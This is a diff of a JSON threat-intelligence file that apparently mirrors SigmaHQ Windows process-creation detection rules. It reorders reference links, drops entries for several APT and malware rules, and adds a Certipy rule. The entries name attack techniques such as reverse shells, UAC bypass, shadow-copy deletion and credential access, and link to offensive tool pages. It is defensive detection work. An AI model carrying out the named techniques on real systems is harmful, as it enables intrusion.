+ "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://twitter.com/EricaZelic/status/1614075109827874817",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml"
],
"tags": [
@@ -44966,8 +44423,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/0gtweet/status/1206692239839289344",
"https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/",
+ "https://twitter.com/0gtweet/status/1206692239839289344",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml"
],
"tags": [
@@ -44987,52 +44444,6 @@
"uuid": "cd71385d-fd9b-4691-9b98-2b1f7e508714",
"value": "Lolbin Runexehelper Use As Proxy"
},
- {
- "description": "Detects Trojan loader activity as used by APT28",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2018/03/01",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_sofacy.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/",
- "https://twitter.com/ClearskySec/status/960924755355369472",
- "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml"
- ],
- "tags": [
- "attack.g0007",
- "attack.execution",
- "attack.t1059.003",
- "attack.defense_evasion",
- "car.2013-10-002",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "ba778144-5e3d-40cf-8af9-e28fb1df1e20",
- "value": "Sofacy Trojan Loader Activity"
- },
{
"description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images",
"meta": {
@@ -45046,8 +44457,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism",
+ "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml"
],
"tags": [
@@ -45080,9 +44491,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md",
"https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/",
"https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_namespace_defender.yml"
],
"tags": [
@@ -45216,8 +44627,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/",
"https://dtm.uk/wuauclt/",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml"
],
"tags": [
@@ -45252,8 +44663,8 @@
"logsource.product": "windows",
"refs": [
"https://redcanary.com/blog/right-to-left-override/",
- "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method",
"https://unicode-explorer.com/c/202E",
+ "https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_right_to_left_override.yml"
],
"tags": [
@@ -45287,8 +44698,8 @@
"logsource.product": "windows",
"refs": [
"https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/",
- "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf",
"https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2",
+ "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml"
],
"tags": [
@@ -45329,8 +44740,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml"
],
"tags": "No established tags"
@@ -45384,14 +44795,14 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/gN3mes1s/status/941315826107510784",
+ "https://github.com/SigmaHQ/sigma/issues/3742",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
"https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
- "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
- "https://twitter.com/Hexacorn/status/776122138063409152",
- "https://github.com/SigmaHQ/sigma/issues/3742",
- "https://twitter.com/gN3mes1s/status/941315826107510784",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
- "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/Hexacorn/status/776122138063409152",
+ "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml"
],
"tags": [
@@ -45433,9 +44844,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1",
"https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml"
],
"tags": [
@@ -45568,8 +44979,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/cyb3rops/status/1562072617552678912",
"https://ss64.com/nt/cmd.html",
+ "https://twitter.com/cyb3rops/status/1562072617552678912",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml"
],
"tags": [
@@ -45687,9 +45098,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
"https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
"https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
- "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml"
],
"tags": [
@@ -45744,106 +45155,38 @@
"value": "Suspicious Desktopimgdownldr Command"
},
{
- "description": "Detects activity mentioned in Operation Wocao report",
+ "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.",
"meta": {
- "author": "Florian Roth (Nextron Systems), frack113",
- "creation_date": "2019/12/20",
- "falsepositive": [
- "Administrators that use checkadmin.exe tool to enumerate local administrators"
- ],
- "filename": "proc_creation_win_apt_wocao.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1207671369963646976",
- "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1012",
- "attack.defense_evasion",
- "attack.t1036.004",
- "attack.t1027",
- "attack.execution",
- "attack.t1053.005",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab",
- "value": "Operation Wocao Activity"
- },
- {
- "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report",
- "meta": {
- "author": "Bhabesh Raj",
- "creation_date": "2021/05/05",
+ "author": "pH-T (Nextron Systems)",
+ "creation_date": "2023/04/17",
"falsepositive": [
"Unlikely"
],
- "filename": "proc_creation_win_malware_pingback_backdoor.yml",
+ "filename": "proc_creation_win_hktl_certipy.yml",
"level": "high",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
- "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_pingback_backdoor.yml"
+ "https://github.com/ly4k/Certipy",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certipy.yml"
],
"tags": [
- "attack.persistence",
- "attack.t1574.001"
+ "attack.discovery",
+ "attack.credential_access",
+ "attack.t1649"
]
},
"related": [
{
- "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "related-to"
}
],
- "uuid": "b2400ffb-7680-47c0-b08a-098a7de7e7a9",
- "value": "Pingback Backdoor Activity"
+ "uuid": "6938366d-8954-4ddc-baff-c830b3ba8fcd",
+ "value": "HackTool - Certipy Execution"
},
{
"description": "Detects potential commandline obfuscation using known escape characters",
@@ -45859,10 +45202,10 @@
"logsource.product": "windows",
"refs": [
"https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/",
- "https://twitter.com/Hexacorn/status/885553465417756673",
- "https://twitter.com/vysecurity/status/885545634958385153",
- "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques",
"https://twitter.com/Hexacorn/status/885570278637678592",
+ "https://twitter.com/Hexacorn/status/885553465417756673",
+ "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques",
+ "https://twitter.com/vysecurity/status/885545634958385153",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml"
],
"tags": [
@@ -46053,9 +45396,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone",
"https://ss64.com/nt/dsacls.html",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)",
- "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml"
],
"tags": [
@@ -46139,8 +45482,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.youtube.com/watch?v=ro2QuZTIMBM",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml"
],
"tags": [
@@ -46275,7 +45618,7 @@
{
"description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule",
"meta": {
- "author": "Florian Roth (Nextron Systems), omkar72, oscd.community",
+ "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel",
"creation_date": "2019/01/29",
"falsepositive": [
"Legitimate administration activity",
@@ -46286,9 +45629,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.dfirnotes.net/portproxy_detection/",
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
"https://adepts.of0x.cc/netsh-portproxy-code/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
+ "https://www.dfirnotes.net/portproxy_detection/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml"
],
"tags": [
@@ -46475,8 +45818,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa",
+ "https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension_parent.yml"
],
"tags": [
@@ -46509,9 +45852,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/gN3mes1s/status/1222095371175911424",
"https://twitter.com/gN3mes1s/status/1222088214581825540",
"https://twitter.com/gN3mes1s/status/1222095963789111296",
- "https://twitter.com/gN3mes1s/status/1222095371175911424",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml"
],
"tags": [
@@ -46544,8 +45887,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
"https://twitter.com/orange_8361/status/1518970259868626944",
+ "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml"
],
"tags": [
@@ -46569,8 +45912,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"
],
"tags": [
@@ -46639,8 +45982,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
"https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/",
+ "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_execution.yml"
],
"tags": [
@@ -46859,8 +46202,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
+ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"
],
@@ -46952,8 +46295,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf",
"https://twitter.com/johnlatwc/status/1408062131321270282?s=12",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"
],
"tags": [
@@ -47081,15 +46424,16 @@
"author": "_pete_0, TheDFIRReport",
"creation_date": "2022/02/21",
"falsepositive": [
- "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command."
+ "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.",
+ "Discord was seen using chcp to look up code pages"
],
"filename": "proc_creation_win_chcp_codepage_lookup.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml"
],
"tags": [
@@ -47143,64 +46487,6 @@
"uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4",
"value": "HackTool - SharPersist Execution"
},
- {
- "description": "Detects specific process parameters as used by Mustang Panda droppers",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community",
- "creation_date": "2019/10/30",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_mustangpanda.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/",
- "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
- "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml"
- ],
- "tags": [
- "attack.t1587.001",
- "attack.resource_development"
- ]
- },
- "related": [
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00",
- "value": "Mustang Panda Dropper"
- },
- {
- "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/09",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_griffon_patterns.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_griffon_patterns.yml"
- ],
- "tags": [
- "attack.execution"
- ]
- },
- "uuid": "bcc6f179-11cd-4111-a9a6-0fab68515cf7",
- "value": "Griffon Malware Attack Pattern"
- },
{
"description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe",
"meta": {
@@ -47248,8 +46534,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/3proxy/3proxy",
"https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://github.com/3proxy/3proxy",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml"
],
"tags": [
@@ -47282,10 +46568,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/ReaQta/status/1222548288731217921",
- "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html",
"https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
+ "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html",
"https://www.activecyber.us/activelabs/windows-uac-bypass",
+ "https://twitter.com/ReaQta/status/1222548288731217921",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"
],
"tags": [
@@ -47319,9 +46605,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.python.org/3/using/cmdline.html#cmdoption-c",
- "https://www.revshells.com/",
"https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
+ "https://www.revshells.com/",
+ "https://docs.python.org/3/using/cmdline.html#cmdoption-c",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml"
],
"tags": [
@@ -47354,8 +46640,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks",
+ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml"
],
"tags": [
@@ -47480,8 +46766,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://nsudo.m2team.org/en-us/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml"
],
"tags": [
@@ -47551,50 +46837,6 @@
"uuid": "903076ff-f442-475a-b667-4f246bcc203b",
"value": "Nltest.EXE Execution"
},
- {
- "description": "Detects a ZxShell start by the called and well-known function name",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro",
- "creation_date": "2017/07/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_zxshell.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003",
- "attack.defense_evasion",
- "attack.t1218.011",
- "attack.s0412",
- "attack.g0001"
- ]
- },
- "related": [
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc",
- "value": "ZxShell Malware"
- },
{
"description": "Shadow Copies deletion using operating systems utilities",
"meta": {
@@ -47611,11 +46853,11 @@
"refs": [
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
"https://github.com/Neo23x0/Raccine#the-process",
- "https://redcanary.com/blog/intelligence-insights-october-2021/",
"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
+ "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
"https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
"https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
"https://blog.talosintelligence.com/2017/05/wannacry.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"
@@ -47727,11 +46969,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://man.openbsd.org/ssh_config#ProxyCommand",
- "https://man.openbsd.org/ssh_config#LocalCommand",
- "https://lolbas-project.github.io/lolbas/Binaries/Ssh/",
- "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files",
"https://gtfobins.github.io/gtfobins/ssh/",
+ "https://man.openbsd.org/ssh_config#LocalCommand",
+ "https://man.openbsd.org/ssh_config#ProxyCommand",
+ "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files",
+ "https://lolbas-project.github.io/lolbas/Binaries/Ssh/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"
],
"tags": [
@@ -47751,52 +46993,6 @@
"uuid": "7d6d30b8-5b91-4b90-a891-46cccaf29598",
"value": "Lolbin Ssh.exe Use As Proxy"
},
- {
- "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/04/13",
- "falsepositive": [
- "Unknown",
- "Some cases in which the service spawned a werfault.exe process"
- ],
- "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html",
- "https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/",
- "https://twitter.com/cyb3rops/status/1514217991034097664",
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.execution",
- "attack.t1569.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16",
